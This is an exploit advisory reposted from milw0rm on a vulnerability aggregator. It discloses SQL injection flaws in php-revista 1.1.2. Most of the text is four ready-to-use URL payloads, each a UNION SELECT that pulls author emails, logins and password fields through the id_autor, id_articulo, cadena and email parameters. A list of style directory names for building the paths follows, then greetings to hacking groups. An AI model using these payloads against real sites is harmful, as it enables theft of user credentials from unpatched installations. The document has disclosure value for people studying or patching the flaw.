Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16465
HistoryMar 25, 2007 - 12:00 a.m.

php-revista <= 1.1.2 Remote SQL Injection Exploit

2007-03-2500:00:00
vulners.com
27

php-revista <= 1.1.2 Remote SQL Injection Exploit

Found by & contact : Cold z3ro , [email protected]

script :
http://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400&amp;big_mirror=0

Exploits :

Http://www.Victem.0/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*

Http://www.Victem.0/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from
autores where id =1 /*

Http://www.Victem.0/revista/estilo/[STYLE]/busqueda.php?cadena=&#39;+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*

Http://www.Victem.0/revista/estilo/[STYLE]/lista.php?email=&#39;+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*

Styles names :
/discreet/
/galveston/
/mergedidea/
/Widget_Factory/
/Digital_Multiplex/

---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|
|Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
|Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
|The Sniper| | DearMan | |Pro Hackers| | 020 | | abdulla00 " alz3eem" | | The_Viper |Kof2002|
All i know

Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

Print : Team Hell

milw0rm.com [2007-03-21]